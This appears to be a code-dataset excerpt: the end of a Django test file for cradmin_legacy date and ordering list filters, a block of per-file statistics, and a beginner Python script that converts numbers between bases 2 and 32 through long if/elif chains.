{start_of_month, middle_of_month, end_of_month},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_this_year_nomatch(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_year'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 1))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 24)):
self.assertFalse(
testfilter.filter(queryobject=FilterTestModel.objects.all()).exists())
def test_this_year_match(self):
testfilter = listfilter.django.single.select.DateTime(slug='mydatetimefield')
testfilter.set_values(values=['this_year'])
start_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 1))
middle_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 6, 1))
end_of_year = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 12, 31, 23))
with mock.patch('cradmin_legacy.viewhelpers.listfilter.basefilters.single.abstractselect.timezone.now',
lambda: datetimeutils.default_timezone_datetime(2015, 12, 24)):
self.assertEqual(
{start_of_year, middle_of_year, end_of_year},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestNullDateTime(TestCase):
def test_is_null(self):
testfilter = listfilter.django.single.select.NullDateTime(slug='mynulldatetimefield')
testfilter.set_values(values=['is_null'])
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
isnull = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=None)
self.assertEqual(
{isnull},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_is_not_null(self):
testfilter = listfilter.django.single.select.NullDateTime(slug='mynulldatetimefield')
testfilter.set_values(values=['is_not_null'])
isnotnull = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=datetimeutils.default_timezone_datetime(2014, 12, 31))
baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mynulldatetimefield=None)
self.assertEqual(
{isnotnull},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
class TestOrderBy(TestCase):
def test_invalid_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return []
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=['invalidstuff'])
testitem = baker.make('cradmin_viewhelpers_testapp.FilterTestModel')
self.assertEqual(
{testitem},
set(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_no_value_defaults_to_the_empty_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return [
('', {
'label': 'mylabel',
'order_by': ['mydatetimefield'],
}),
]
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=[])
testitem2 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 2))
testitem1 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
self.assertEqual(
[testitem1, testitem2],
list(testfilter.filter(queryobject=FilterTestModel.objects.all())))
def test_nondefault_value(self):
class OrderByFilter(listfilter.django.single.select.AbstractOrderBy):
def get_ordering_options(self):
return [
('', {
'label': 'asc',
'order_by': ['mydatetimefield'],
}),
('desc', {
'label': 'desc',
'order_by': ['-mydatetimefield'],
}),
]
testfilter = OrderByFilter(slug='orderby')
testfilter.set_values(values=['desc'])
testitem2 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2016, 1, 2))
testitem1 = baker.make('cradmin_viewhelpers_testapp.FilterTestModel',
mydatetimefield=datetimeutils.default_timezone_datetime(2015, 1, 2))
self.assertEqual(
[testitem2, testitem1],
list(testfilter.filter(queryobject=FilterTestModel.objects.all())))
| 55.099707
| 111
| 0.665123
| 1,716
| 18,789
| 7.082168
| 0.081585
| 0.071094
| 0.098741
| 0.104419
| 0.928577
| 0.923969
| 0.921007
| 0.914918
| 0.883486
| 0.878384
| 0
| 0.021927
| 0.235404
| 18,789
| 340
| 112
| 55.261765
| 0.824029
| 0
| 0
| 0.731788
| 0
| 0
| 0.197403
| 0.161211
| 0
| 0
| 0
| 0
| 0.086093
| 1
| 0.096026
| false
| 0
| 0.02649
| 0.009934
| 0.15894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c46c3de0b7231d58a348ef921880f2a3b454ce7
| 64,803
|
py
|
Python
|
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
Base Converter/main.py
|
mrif449/simple-python-projects
|
1d57b861f2d54568ebab955722f782a351a57f21
|
[
"MIT"
] | null | null | null |
print("Welcome to Base Converter Calculator!!!")
print("You can select your calculation mode by entering the serial number, or write 'close' stop calculating.")
print()
print("Note: You can also close the whole program by pressing Enter after closing calculation menu or manually.")
#Options:
print("Basic Bases:")
print("Decimal = 10")
print("Binary = 2")
print("Octal = 8")
print("Hexa-Decimal = 16")
print("...............................")
print("Let's Start...")
print("Press Enter to Start...")
inp = input("or Anything to Stop...")
while True:
if inp == "":
#Selecting Calculation Mode:
#command = (input("Select your calculation mode (1-14): "))
i_base = int(input("Enter the input Base: "))
o_base = int(input("Enter the output Base: "))
#Decimal to Binary
if i_base == 10 and o_base == 2:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Octal
elif i_base == 10 and o_base == 8:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Hexa-Decimal
elif i_base == 10 and o_base == 16:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Binary to Decimal
elif i_base == 2 and o_base == 10:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Binary to Octal
elif i_base == 2 and o_base == 8:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Binary to Hexa-Decimal
elif i_base == 2 and o_base == 16:
number = int(input("Enter the Binary number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(2**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Octal to Decimal
elif i_base == 8 and o_base == 10:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Octal to Binary
elif i_base == 8 and o_base == 2:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Octal to Hexa-Decimal
elif i_base == 8 and o_base == 16:
number = int(input("Enter the Octal number: "))
string = str(number)
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(8**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
temp2 = temp%16
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
else:
string += str(temp%16)
temp = temp // 16
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Hexa-Decimal to Decimal
elif i_base == 16 and o_base == 10:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
print("=============================")
print("Your result is",sum)
print("=============================")
#Hexa-Decimal to Binary
elif i_base == 16 and o_base == 2:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%2)
temp = temp // 2
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Hexa-Decimal to Octal
elif i_base == 16 and o_base == 8:
string = input("Enter the Hexa-Decimal Number: ")
count = 0
sum = 0
for x in string:
count += 1
string_list = []
for b in string:
if b.upper() == "A":
string_list.append(10)
elif b.upper() == "B":
string_list.append(11)
elif b.upper() == "C":
string_list.append(12)
elif b.upper() == "D":
string_list.append(13)
elif b.upper() == "E":
string_list.append(14)
elif b.upper() == "F":
string_list.append(15)
else:
string_list.append(int(b))
temp_list = []
for y in range(0,count):
temp_list.append(int(y))
temp_list.reverse()
for x in range(0,len(string_list)):
sum += (string_list[x]*(16**temp_list[x]))
number2 = sum
temp = number2
string = ""
temp_list = []
while temp > 0:
string += str(temp%8)
temp = temp // 8
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
#Decimal to Other Base:
elif i_base == 10:
if o_base == 3:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%3)
temp = temp // 3
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 4:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%4)
temp = temp // 4
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 5:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%5)
temp = temp // 5
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 6:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%6)
temp = temp // 6
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 7:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%7)
temp = temp // 7
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 9:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
string += str(temp%9)
temp = temp // 9
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 11:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%11
if temp2 == 10:
string += "A"
else:
string += str(temp%11)
temp = temp // 11
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 12:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%12
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
else:
string += str(temp%12)
temp = temp // 12
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 13:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%13
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
else:
string += str(temp%13)
temp = temp // 13
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 14:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%14
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
else:
string += str(temp%14)
temp = temp // 14
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 15:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%15
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
else:
string += str(temp%15)
temp = temp // 15
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 17:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%17
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
else:
string += str(temp%17)
temp = temp // 17
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 18:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%18
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
else:
string += str(temp%18)
temp = temp // 18
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 19:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%19
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
else:
string += str(temp%19)
temp = temp // 19
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 20:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%20
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
else:
string += str(temp%20)
temp = temp // 20
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 21:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%21
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
else:
string += str(temp%21)
temp = temp // 21
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 22:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%22
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
else:
string += str(temp%22)
temp = temp // 22
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 23:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%23
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
else:
string += str(temp%23)
temp = temp // 23
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 24:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%24
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
else:
string += str(temp%24)
temp = temp // 24
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 25:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%25
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
else:
string += str(temp%25)
temp = temp // 25
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 26:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%26
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
else:
string += str(temp%26)
temp = temp // 26
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 27:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%27
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
else:
string += str(temp%27)
temp = temp // 27
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 28:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%28
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
else:
string += str(temp%28)
temp = temp // 28
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 29:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%29
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
else:
string += str(temp%29)
temp = temp // 29
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 30:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%30
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
else:
string += str(temp%30)
temp = temp // 30
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 31:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%31
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
else:
string += str(temp%31)
temp = temp // 31
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 32:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%32
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
else:
string += str(temp%32)
temp = temp // 32
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
